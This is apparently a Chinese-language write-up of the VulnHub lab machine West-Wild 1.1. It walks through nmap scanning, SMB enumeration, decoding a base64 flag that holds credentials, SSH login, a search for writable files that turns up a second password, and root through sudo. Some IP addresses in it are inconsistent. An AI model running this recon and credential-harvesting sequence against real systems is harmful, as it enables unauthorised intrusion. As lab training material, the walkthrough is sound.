【VulnHub系列】West-Wlid1.1

实验信息

Kali:192.168.10.106

WestWild:192.168.104

实验过程

通过arp-scan查找目标主机,确定目标主机IP192.168.10.104

sudo arp-scan --interface eth0 192.168.10.0/24

 

 探测靶机开放的端口

sudo nmap -sT --min-rate 10000 -p- 192.168.10.104 -oA nmap/result

 对刚刚扫出来的端口进行详细的扫描+脚本扫描

sudo nmap -sT -sC -sV -O -p22,80,139,445 192.168.10.104 -oA nmap/detail 
sudo nmap --script=vuln -p 22,80,139,445 192.168.10.104 -oA nmap/vuln

 同时也进行UDP扫描,万一TCP端口没有进展可以尝试UDP端口

sudo nmap -sU --top-ports 20 192.168.10.104 -oA nmap/udp

 先从80端口开始

 

尝试下常见的文件,并没有存在

http://192.168.10.106/readme.txt 
http://192.168.10.106/robots.txt

用gobuster来爆破

 

网页源码什么都没什么有用信息,网页上有一张图片下载来看有没有隐写一些信息

 

 80端口没有什么可用信息,只能转头试试看smb服务

 

sudo smbmap -H 192.168.10.104

wave目录是可读的,看看有没有可用的信息

sudo smbmap -H 192.168.10.104 
prompt
get message_from_aveng.txt 
get message_from_aveng.txt 
exit

 

FLAG1.txt的内容像是Base64编码后的内容,尝试解码

echo  RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K
| base64 -d

得到凭据,SSH连接上靶机

ssh wavex@192.168.10.104

进行常规的信息收集

 

 

! -path '/proc/*':将/proc/*路径排除2>/dev/null:将错误信息重定向到黑洞

find / -writable -type f ! -path '/proc/*' 2>/dev/null

发现一个ififoregt.sh文件

 

查看内容发现另一个凭据

 

figlet是一个用于生成字符艺术的命令行工具。它可以将普通文本转换成具有装饰效果的字符画,并支持多种字体和输出 格式。

#!/bin/bash
figlet "if i foregt so this my way" echo "user:aveng"
echo "password:kaizen+80"

切换到aveng账号发现其sudo拥有全部权限,可以直接拿下